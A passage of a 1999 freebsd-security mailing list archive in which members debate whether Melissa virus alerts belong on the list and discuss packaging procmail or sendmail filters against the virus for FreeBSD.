23:09:25 +0200 (CETDST) Received: by kantoor-1.tepucom.nl with Microsoft Mail id <01BE7A39.860D5DA0@kantoor-1.tepucom.nl>; Mon, 29 Mar 1999 23:11:49 +-200 Message-ID: <01BE7A39.860D5DA0@kantoor-1.tepucom.nl> From: "Theo Purmer (Tepucom)" To: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements Date: Mon, 29 Mar 1999 23:11:48 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org if somebody should want to be informed about virusses and stuff subscribe to the cert advisory list at http://www.cert.org Theo Purmer Tepucom The Netherlands To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 13:14:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.numachi.com (numachi.numachi.com [198.175.254.2]) by hub.freebsd.org (Postfix) with SMTP id DC45D14D21 for ; Mon, 29 Mar 1999 13:14:29 -0800 (PST) (envelope-from reichert@numachi.com) Received: (qmail 4334 invoked by uid 1001); 29 Mar 1999 21:14:06 -0000 Date: Mon, 29 Mar 1999 16:14:06 -0500 From: Brian Reichert To: freebsd-security@FreeBSD.ORG Subject: Re: virus announcements? Message-ID: <19990329161406.G2501@numachi.com> References: <36FFE82E.9FF42BF9@intech.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <36FFE82E.9FF42BF9@intech.net>; from Coranth Gryphon on Mon, Mar 29, 1999 at 03:53:02PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 29, 1999 at 03:53:02PM -0500, Coranth Gryphon wrote: > I know that this is a general security list, but is is appropriate > to post virus announcements here for beasties which cannot affect > FreeBSD (or any unix) directly? >>>> info freebsd-security FREEBSD-SECURITY Security issues FreeBSD computer security issues (DES, Kerberos, known security holes and fixes, etc). So, I would think not. There are a number of well-established lists for virus warnings, and 'general' security problems. Viruses, as these are discussed, are - not a concern for a FreeBSD system, directly. If it is revealed that a virus 'tickles' a badly configured system utility, then notice should be sent out that the utility is badly configured (which is now the concern). I feel then that the virus is then immaterial. - not usually a concern for UNIX users, for (in general) they don't use tools that run arbitrary code. (That's why a lot of informed people turn off Java and Javascript in a browser.) I feel that the core issue of UNIX security is to keep users (local or remote) from hurting each other, or the system. If they want to adopt practices wherein they hurt themselves, that's their problem. > -coranth Hey! Long time no see! > PS> And maybe it's just me, but sending a virus alert about attachments > and putting the data in an attachment, seems to defeat the purpose... I've never seen a virus alert about an 'attachment'. I've seen alerts about specific document types, that may be stored in an attachment via email. Said document types may also be retrieved by a web browser, or utilized from a local hard drive. In all of these cases, the virus is activated (ie., granted control) _by the viewing tool_, not by the storage/retrieval/MIME mechanism. Configuring a personal environment that runs arbitrary code supplied from the internet is silly. Pie In the Sky: it would not be an issue of people used real software. And as for using attachments to store separate discrete documents, well, isn't that what they're _for_? > ---------------------------------------+---------------------------- > Coranth Gryphon | Work Phone: 561-912-2497 > Chief Architect, Hiway Technologies | #include > ---------------------------------------+---------------------------- > When all else fails, do the impossible. -- Brian 'you Bastard' Reichert reichert@numachi.com 37 Crystal Ave. #303 Current daytime number: (603)-434-6842 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 13:17:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id EA60F14D21 for ; Mon, 29 Mar 1999 13:17:12 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id XAA05184; Mon, 29 Mar 1999 23:16:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id XAA21300; Mon, 29 Mar 1999 23:16:46 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "Theo Purmer (Tepucom)" Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 23:11:48." <01BE7A39.860D5DA0@kantoor-1.tepucom.nl> Date: Mon, 29 Mar 1999 23:16:46 +0200 Message-ID: <21298.922742206@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <01BE7A39.860D5DA0@kantoor-1.tepucom.nl>, "Theo Purmer (Tepucom)" wr ites: >if somebody should want to be informed about virusses and stuff >subscribe to the cert advisory list at http://www.cert.org www.sans.org is highly recommended from here. And mind you, the two of you may sit in your own private heavens, but many of the rest of us work in the real world. This particular outbreak seems to warrant the original email. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 13:48: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.volant.org (phoenix.volant.org [205.179.79.193]) by hub.freebsd.org (Postfix) with ESMTP id 4173315141 for ; Mon, 29 Mar 1999 13:48:06 -0800 (PST) (envelope-from patl@phoenix.volant.org) Received: from asimov.phoenix.volant.org ([205.179.79.65]) by phoenix.volant.org with smtp (Exim 1.92 #8) id 10Rjsp-0001UE-00; Mon, 29 Mar 1999 13:47:47 -0800 Received: from localhost by asimov.phoenix.volant.org (SMI-8.6/SMI-SVR4) id NAA23930; Mon, 29 Mar 1999 13:47:41 -0800 Date: Mon, 29 Mar 1999 13:47:41 -0800 (PST) From: patl@phoenix.volant.org Reply-To: patl@phoenix.volant.org Subject: Re: Virus Announcements To: Poul-Henning Kamp Cc: "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" In-Reply-To: <21298.922742206@critter.freebsd.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > And mind you, the two of you may sit in your own private heavens, > but many of the rest of us work in the real world. This particular > outbreak seems to warrant the original email. If by 'the real world' you mean an environment where you need to worry about virii that infect Windows, M$ Word documents, Excell spreadsheets, etc.; then you should be subscribed to one or more lists dedicated to those topics. Let's keep this list FreeBSD specific, please. -Pat To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15: 7: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 4179515501 for ; Mon, 29 Mar 1999 15:06:47 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA02595; Mon, 29 Mar 1999 16:03:04 -0700 (MST) Message-Id: <4.2.0.32.19990329155900.00a557c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 16:03:00 -0700 To: patl@phoenix.volant.org, Poul-Henning Kamp From: Brett Glass Subject: Re: Virus Announcements Cc: "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" In-Reply-To: References: <21298.922742206@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, here's something FreeBSD-specific we ought to do. Let's make up a FreeBSD package that installs John Hardin's e-mail sanitizing filters with some sane default settings that kill the Melissa virus. John's filters can be found at ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html All we need to do is tweak the paths for FreeBSD, bring in procmail as a dependency, and tell the user how to configure Sendmail to use procmail as the local delivery agent. This would be something that could be touted as an advantage of using FreeBSD as a mail server. Of course, I'll probably be told that this is a bad idea because Jordan didn't think of it. --Brett Glass At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: >> And mind you, the two of you may sit in your own private heavens, >> but many of the rest of us work in the real world. This particular >> outbreak seems to warrant the original email. > >If by 'the real world' you mean an environment where you need to >worry about virii that infect Windows, M$ Word documents, Excell >spreadsheets, etc.; then you should be subscribed to one or more >lists dedicated to those topics. Let's keep this list FreeBSD >specific, please. > > > >-Pat > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15:24:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id C28CB14C4F for ; Mon, 29 Mar 1999 15:24:41 -0800 (PST) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id RAA07912; Mon, 29 Mar 1999 17:24:18 -0600 (CST) From: Igor Roshchin Message-Id: <199903292324.RAA07912@alecto.physics.uiuc.edu> Subject: Re: Virus Announcements In-Reply-To: <4.2.0.32.19990329155900.00a557c0@localhost> from "Brett Glass" at "Mar 29, 1999 4: 3: 0 pm" To: brett@lariat.org (Brett Glass) Date: Mon, 29 Mar 1999 17:24:18 -0600 (CST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you are talking about using FreeBSD to filter Melissa virus (and some similar virus), you might consider tweaking the rulesets for sendmail. I haven't tried installing that ruleset, but the CERT advisory recommended: III. Solutions * Block messages with the signature of this virus at your mail transfer agents. With Sendmail Nick Christenson of sendmail.com provided information about configuring sendmail to filter out messages that may contain the Melissa virus. This information is available from the follow URL: ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m elissa-filter.txt Since sendmail is the default MTA in FreeBSD, this might be more universal to the general public (compared to procmail's rules/patches). IgoR PS. I agree that this list should contain only FreeBSD-related (or potentially related) issues. Other issues are important, but there are other lists for them - e.g. BUGTRAQ .. > OK, here's something FreeBSD-specific we ought to do. Let's make > up a FreeBSD package that installs John Hardin's e-mail sanitizing > filters with some sane default settings that kill the Melissa virus. > > John's filters can be found at > > ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html > > All we need to do is tweak the paths for FreeBSD, bring in > procmail as a dependency, and tell the user how to configure > Sendmail to use procmail as the local delivery agent. > > This would be something that could be touted as an advantage of > using FreeBSD as a mail server. > > Of course, I'll probably be told that this is a bad idea because > Jordan didn't think of it. > > --Brett Glass > > > At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: > >> And mind you, the two of you may sit in your own private heavens, > >> but many of the rest of us work in the real world. This particular > >> outbreak seems to warrant the original email. > > > >If by 'the real world' you mean an environment where you need to > >worry about virii that infect Windows, M$ Word documents, Excell > >spreadsheets, etc.; then you should be subscribed to one or more > >lists dedicated to those topics. Let's keep this list FreeBSD > >specific, please. > > > > > > > >-Pat > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15:45:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 3790E14FD0 for ; Mon, 29 Mar 1999 15:45:18 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA03094; Mon, 29 Mar 1999 16:44:53 -0700 (MST) Message-Id: <4.2.0.32.19990329164244.04553770@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 16:44:42 -0700 To: Igor Roshchin From: Brett Glass Subject: Re: Virus Announcements Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199903292324.RAA07912@alecto.physics.uiuc.edu> References: <4.2.0.32.19990329155900.00a557c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sendmail's filtering is quite limited compared to that of Procmail. And the "quick fix" posted by Sendmail, Inc. is trivial to defeat. We've installed both, and the Procmail filters are catching lots more suspicious traffic. --Brett At 05:24 PM 3/29/99 -0600, Igor Roshchin wrote: >If you are talking about using FreeBSD to filter Melissa virus >(and some similar virus), you might consider tweaking the rulesets for >sendmail. > >I haven't tried installing that ruleset, >but the CERT advisory recommended: > > >III. Solutions > > * Block messages with the signature of this virus at your mail transfer > agents. > > With Sendmail > > Nick Christenson of sendmail.com provided information about > configuring sendmail to filter out messages that may contain the > Melissa virus. This information is available from the follow URL: > ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m > elissa-filter.txt > > >Since sendmail is the default MTA in FreeBSD, this might be more universal >to the general public (compared to procmail's rules/patches). > >IgoR > > >PS. I agree that this list should contain only FreeBSD-related >(or potentially related) issues. >Other issues are important, but there are other lists for them - >e.g. BUGTRAQ .. > >> OK, here's something FreeBSD-specific we ought to do. Let's make >> up a FreeBSD package that installs John Hardin's e-mail sanitizing >> filters with some sane default settings that kill the Melissa virus. >> >> John's filters can be found at >> >> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html >> >> All we need to do is tweak the paths for FreeBSD, bring in >> procmail as a dependency, and tell the user how to configure >> Sendmail to use procmail as the local delivery agent. >> >> This would be something that could be touted as an advantage of >> using FreeBSD as a mail server. >> >> Of course, I'll probably be told that this is a bad idea because >> Jordan didn't think of it. >> >> --Brett Glass >> >> >> At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: >> >> And mind you, the two of you may sit in your own private heavens, >> >> but many of the rest of us work in the real world. This particular >> >> outbreak seems to warrant the original email. >> > >> >If by 'the real world' you mean an environment where you need to >> >worry about virii that infect Windows, M$ Word documents, Excell >> >spreadsheets, etc.; then you should be subscribed to one or more >> >lists dedicated to those topics. Let's keep this list FreeBSD >> >specific, please. >> > >> > >> > >> >-Pat >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-security" in the body of the message >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15:59:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 09C7814C4F for ; Mon, 29 Mar 1999 15:59:34 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 2.12 #1) id 10RlsH-0000Mz-00; Tue, 30 Mar 1999 01:55:21 +0200 From: Sheldon Hearn To: Brett Glass Cc: patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 16:03:00 MST." <4.2.0.32.19990329155900.00a557c0@localhost> Date: Tue, 30 Mar 1999 01:55:21 +0200 Message-ID: <1424.922751721@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999 16:03:00 MST, Brett Glass wrote: > Of course, I'll probably be told that this is a bad idea because > Jordan didn't think of it. It's a bad idea because the people throwing ideas around are speaking English and not diff(1). Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 16:47: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 1950A14ED0 for ; Mon, 29 Mar 1999 16:46:59 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA03671; Mon, 29 Mar 1999 17:43:05 -0700 (MST) Message-Id: <4.2.0.32.19990329174138.00cc2f00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 17:43:01 -0700 To: Sheldon Hearn From: Brett Glass Subject: Re: Virus Announcements Cc: patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" In-Reply-To: <1424.922751721@axl.noc.iafrica.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, you can't do it in diff(1), because it has to be created ex nihilo. Oh, and there are no docs on how to do it; the man pages for pkg_add and pkg_info are (characteristically) mute on how to MAKE a package. --Brett At 01:55 AM 3/30/99 +0200, Sheldon Hearn wrote: >On Mon, 29 Mar 1999 16:03:00 MST, Brett Glass wrote: > >> Of course, I'll probably be told that this is a bad idea because >> Jordan didn't think of it. > >It's a bad idea because the people throwing ideas around are speaking >English and not diff(1). > >Ciao, >Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 16:49:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from sawasdee.cc.columbia.edu (sawasdee.cc.columbia.edu [128.59.59.136]) by hub.freebsd.org (Postfix) with ESMTP id E710F14D8F for ; Mon, 29 Mar 1999 16:49:10 -0800 (PST) (envelope-from stuyman@confusion.net) Received: from confusion.net (dialup-1-80.cc.columbia.edu [128.59.42.89]) by sawasdee.cc.columbia.edu (8.8.5/8.8.5) with ESMTP id TAA20615; Mon, 29 Mar 1999 19:48:40 -0500 (EST) Message-ID: <37001F1B.C2B92D74@confusion.net> Date: Mon, 29 Mar 1999 19:47:23 -0500 From: Laurence Berland Organization: B.R.A.T.T. X-Mailer: Mozilla 4.5 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass , security@freebsd.org Subject: Re: Virus Announcements References: <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just read something about Melissa on ZDNet, scanning it to see if it's dumbed down enough to be read by my computer-illiterate parents. And what do I see at the bottom? That Brett Glass contributed to the article. That makes me happy. I'm glad to see that people from BSD help out windows users, as silly as they may be. Congrats Brett. Brett Glass wrote: > Sendmail's filtering is quite limited compared to that of Procmail. And > the "quick fix" posted by Sendmail, Inc. is trivial to defeat. We've > installed both, and the Procmail filters are catching lots more suspicious > traffic. > > --Brett > > At 05:24 PM 3/29/99 -0600, Igor Roshchin wrote: > >If you are talking about using FreeBSD to filter Melissa virus > >(and some similar virus), you might consider tweaking the rulesets for > >sendmail. > > > >I haven't tried installing that ruleset, > >but the CERT advisory recommended: > > > > > >III. Solutions > > > > * Block messages with the signature of this virus at your mail transfer > > agents. > > > > With Sendmail > > > > Nick Christenson of sendmail.com provided information about > > configuring sendmail to filter out messages that may contain the > > Melissa virus. This information is available from the follow URL: > > ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m > > elissa-filter.txt > > > > > >Since sendmail is the default MTA in FreeBSD, this might be more universal > >to the general public (compared to procmail's rules/patches). > > > >IgoR > > > > > >PS. I agree that this list should contain only FreeBSD-related > >(or potentially related) issues. > >Other issues are important, but there are other lists for them - > >e.g. BUGTRAQ .. > > > >> OK, here's something FreeBSD-specific we ought to do. Let's make > >> up a FreeBSD package that installs John Hardin's e-mail sanitizing > >> filters with some sane default settings that kill the Melissa virus. > >> > >> John's filters can be found at > >> > >> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html > >> > >> All we need to do is tweak the paths for FreeBSD, bring in > >> procmail as a dependency, and tell the user how to configure > >> Sendmail to use procmail as the local delivery agent. > >> > >> This would be something that could be touted as an advantage of > >> using FreeBSD as a mail server. > >> > >> Of course, I'll probably be told that this is a bad idea because > >> Jordan didn't think of it. > >> > >> --Brett Glass > >> > >> > >> At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: > >> >> And mind you, the two of you may sit in your own private heavens, > >> >> but many of the rest of us work in the real world. This particular > >> >> outbreak seems to warrant the original email. > >> > > >> >If by 'the real world' you mean an environment where you need to > >> >worry about virii that infect Windows, M$ Word documents, Excell > >> >spreadsheets, etc.; then you should be subscribed to one or more > >> >lists dedicated to those topics. Let's keep this list FreeBSD > >> >specific, please. > >> > > >> > > >> > > >> >-Pat > >> > > >> > > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org > >> >with "unsubscribe freebsd-security" in the body of the message > >> > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-security" in the body of the message > >> > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Laurence Berland, Stuyvesant HS Debate <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Windows 98: n. useless extension to a minor patch release for 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition. http://stuy.debate.net icq #7434346 aol imer E1101 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 16:54:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id ADDF414C48 for ; Mon, 29 Mar 1999 16:53:49 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 2.12 #1) id 10Rmls-0000YS-00; Tue, 30 Mar 1999 02:52:48 +0200 From: Sheldon Hearn To: Brett Glass Cc: patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 17:43:01 MST." <4.2.0.32.19990329174138.00cc2f00@localhost> Date: Tue, 30 Mar 1999 02:52:47 +0200 Message-ID: <2135.922755167@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999 17:43:01 MST, Brett Glass wrote: > Sorry, you can't do it in diff(1), because it has to be created ex > nihilo. Diff(1)'s -N option is useful for ex nihilo creations. Anyway, the point is that this is _another_ thread going nowhere, driven by several folks (who care but can't) saying "you should" to people who can but don't care. You've been around long enough to know where that goes... > Oh, and there are no docs on how to do it; the man pages for pkg_add > and pkg_info are (characteristically) mute on how to MAKE a package. This is a _particularly_ lame comment, indicative of the nature of this whole thread. See pkg_create(1) and be amazed. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 17: 2:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from cs.bc.edu (cs.bc.edu [136.167.32.100]) by hub.freebsd.org (Postfix) with ESMTP id 9F9B114C48 for ; Mon, 29 Mar 1999 17:01:58 -0800 (PST) (envelope-from kelleyry@cs.bc.edu) Received: from localhost (kelleyry@localhost) by cs.bc.edu (8.8.6/8.8.6) with ESMTP id TAA19262; Mon, 29 Mar 1999 19:57:37 -0500 (EST) Date: Mon, 29 Mar 1999 19:57:37 -0500 (EST) From: Ryan Kelley To: Brett Glass Cc: Sheldon Hearn , patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-Reply-To: <4.2.0.32.19990329174138.00cc2f00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org check out man pkg_create. -r --------- Ryan Kelley kelleyry@cs.bc.edu "tried to endure what i could not forgive..." - pearl jam On Mon, 29 Mar 1999, Brett Glass wrote: > Sorry, you can't do it in diff(1), because it has to be created ex > nihilo. Oh, and there are no docs on how to do it; the man pages > for pkg_add and pkg_info are (characteristically) mute on how > to MAKE a package. > > --Brett > > At 01:55 AM 3/30/99 +0200, Sheldon Hearn wrote: > > > >On Mon, 29 Mar 1999 16:03:00 MST, Brett Glass wrote: > > > >> Of course, I'll probably be told that this is a bad idea because > >> Jordan didn't think of it. > > > >It's a bad idea because the people throwing ideas around are speaking > >English and not diff(1). > > > >Ciao, > >Sheldon. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 17:10:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 9941214C9D for ; Mon, 29 Mar 1999 17:10:22 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id SAA03919; Mon, 29 Mar 1999 18:09:54 -0700 (MST) Message-Id: <4.2.0.32.19990329175542.00c88430@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 18:09:45 -0700 To: Laurence Berland , security@freebsd.org From: Brett Glass Subject: Re: Virus Announcements In-Reply-To: <37001F1B.C2B92D74@confusion.net> References: <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Most of my day is spent helping Windows users. Most would be totally lost if confronted with a shell prompt. In fact, the majority do not even know the names of the user interface elements they manipulate on their screens. ("Do you see a dialogue box in front of you?" "No, there's a window there, but my computer isn't saying anything.") One of the way I help those users is to keep the UNIX server in the back room running smoothly. If they're going to be running a seriously buggy and crash-prone desktop OS, the mission critical data and functionality needs to stay on a reliable server. I was probably one of the first few people to analyze the Melissa virus, characterize its behavior, and specify filters for it. The best server-side filter I've seen so far is the one I asked John Hardin to add to his procmail security scripts. It won't catch every conceivable variation, but it's a good first line of defense. You can then install virus checkers, get rid of Microsoft Word and Excel, and install Corel Wordperfect Office. Alas, there's no native version of WP Office for FreeBSD. In the meantime, who here knows the arcana of how to build a package? I've looked at the innards of a couple of tarballs but have no idea how to specify dependencies, pop up a message to tell the user what to do next, test for the right version of Perl (you need Perl5 and some FreeBSD users have Perl4), etc. There don't seem to be any docs. --Brett -- At 07:47 PM 3/29/99 -0500, Laurence Berland wrote: >Just read something about Melissa on ZDNet, scanning it to see if it's dumbed >down enough to be read by my computer-illiterate parents. And what do I see at >the bottom? That Brett Glass contributed to the article. That makes me happy. >I'm glad to see that people from BSD help out windows users, as silly as they may >be. Congrats Brett. > >Brett Glass wrote: > >> Sendmail's filtering is quite limited compared to that of Procmail. And >> the "quick fix" posted by Sendmail, Inc. is trivial to defeat. We've >> installed both, and the Procmail filters are catching lots more suspicious >> traffic. >> >> --Brett >> >> At 05:24 PM 3/29/99 -0600, Igor Roshchin wrote: >> >If you are talking about using FreeBSD to filter Melissa virus >> >(and some similar virus), you might consider tweaking the rulesets for >> >sendmail. >> > >> >I haven't tried installing that ruleset, >> >but the CERT advisory recommended: >> > >> > >> >III. Solutions >> > >> > * Block messages with the signature of this virus at your mail transfer >> > agents. >> > >> > With Sendmail >> > >> > Nick Christenson of sendmail.com provided information about >> > configuring sendmail to filter out messages that may contain the >> > Melissa virus. This information is available from the follow URL: >> > ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m >> > elissa-filter.txt >> > >> > >> >Since sendmail is the default MTA in FreeBSD, this might be more universal >> >to the general public (compared to procmail's rules/patches). >> > >> >IgoR >> 